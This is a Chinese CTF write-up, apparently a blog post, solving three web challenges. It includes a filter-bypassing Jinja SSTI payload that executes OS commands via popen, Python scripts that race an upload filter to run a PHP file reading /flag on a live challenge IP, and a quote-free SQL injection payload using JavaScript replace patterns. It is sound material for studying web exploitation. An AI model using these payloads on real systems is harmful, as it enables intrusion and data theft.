目录
Rank-l
Rank-U
sqli or not
Rank-l
username存在报错回显,发现可以打SSTI
本地起一个服务,折半查找fuzz黑名单,不断扔给fenjing去迭代改payload
from flask import Flask, request, render_template_stringapp = Flask(__name__)@app.route('/input', methods=['GET', 'POST'])
def user_input():if request.method == 'POST':# 从POST请求的表单数据中获取用户输入user_input = request.form.get('user_input', '')# 检查输入中是否包含不允许的符号if any(char in user_input for char in ['+', '/', '*','"','\\','{%','%}','urlencode','mod']):return "输入中包含不允许的字符。", 400 # 返回错误信息# 如果输入不包含不允许的符号,使用render_template_stringtemplate = "<h1>用户输入的内容是:{{ input }}</h1>"return render_template_string(template, input=user_input)# 如果是GET请求,显示一个表单return '''<form method="POST"><label for="user_input">请输入内容:</label><input type="text" id="user_input" name="user_input"><button type="submit">提交</button></form>'''if __name__ == '__main__':app.run(host="0.0.0.0",port=1338,debug=True)
payload:
{{cycler.next.__globals__.__builtins__.__import__('os').popen(lipsum['__glob''al''s__']['__builti''ns__']['chr'](37).__add__('c').__mul__(7)|format(116,97,99,32,47,102,42)).read()}}
Rank-U
burpsuite默认字典爆出密码(302的很多都可以登)
登进去是一个任意文件上传,上传后访问是404,文件被立刻删除
打条件竞争
import requestswhile True:burp0_url = "http://139.155.126.78:30675/admin/index.php" # 更新 URLburp0_cookies = {"PHPSESSID": "bsgq3v7goubrk1ciepr0se2dfc"} # 更新 PHP 会话 IDburp0_data = ("------WebKitFormBoundarygIbPTT5pJVbv72RS\r\n""Content-Disposition: form-data; name=\"file_upload\"; filename=\"yjh3.php\"\r\n""Content-Type: application/octet-stream\r\n\r\n""<?php echo file_get_contents('/flag');?>\r\n" # 改为新代码"------WebKitFormBoundarygIbPTT5pJVbv72RS--\r\n")# 发送 POST 请求,只保留 Cookier = requests.post(burp0_url, cookies=burp0_cookies, data=burp0_data)# 提取文件名并保存到本地文件try:filename = r.text.split('./Uploads/1f14bba00da3b75118bc8dbf8625f7d0/')[1].split('</p>')[0]with open('name.txt', 'w') as file:file.write(filename.strip()) # 使用 strip() 去除可能的换行符except IndexError:print("无法提取文件路径或文件上传失败")
import requestsurl0 = 'http://139.155.126.78:30675/admin/Uploads/1f14bba00da3b75118bc8dbf8625f7d0/'while True:# 直接读取文件内容,去除换行符并逐行处理with open('name.txt', 'r') as file:for filename in file:shellpath = url0 + filename.strip() # 使用 strip() 去除换行符# 发起 GET 请求r1 = requests.get(shellpath)# 如果状态码不是 404,输出状态码和响应文本if r1.status_code != 404:print(r1.status_code)print(r1.text)
第一个脚本多运行几个,同时用第二个脚本读到flag
sqli or not
逗号的绕过参考ctfshow web344
【Web】Ctfshow Nodejs刷题记录_ctfshowweb nodejs-CSDN博客
replace的绕过参考
String.prototype.replace() - JavaScript | MDN
引号被ban只要用前面自带的引号就行
本地搭一个服务查看替换后拼接的sql语句,发现成功闭合
var express = require('express');
var app = express(); // 使用 app 而不是 router 来启动服务
var router = express.Router();
module.exports = router;app.use(router);router.get('/', (req, res, next) => {if (req.query.info) {if (req.url.match(/\,/ig)) {res.end('hacker1!');}var info = JSON.parse(req.query.info);// 合并所有信息并一次性回显let responseContent = `Parsed info: ${JSON.stringify(info)}<br>`;if (info.username && info.password) {var username = info.username;var password = info.password;if (info.username.match(/\'|\"|\\/) || info.password.match(/\'|\"|\\/)) {responseContent += 'hacker2!<br>';}var sql = "select * from userinfo where username = '{username}' and password = '{password}'";sql = sql.replace("{username}", username);sql = sql.replace("{password}", password);// 合并生成的 SQL 查询语句responseContent += `Generated SQL: ${sql}<br>`;} else {responseContent += "please input the data<br>";}// 一次性回显所有内容res.send(responseContent);} else {res.end("please input the data");}
});// 指定端口启动服务器
const port = 4000; // 设置端口为 4000
app.listen(port, () => {console.log(`Server running on port ${port}`);
});
payload:
?info={"username":"$`+or+1=1--+"&info="password":"123456"}打入,下载flag文件
![复健第二天之[MoeCTF 2022]baby_file](https://i-blog.csdnimg.cn/direct/4dc2f4edbab54ac19f92a86a37c19c2f.png)
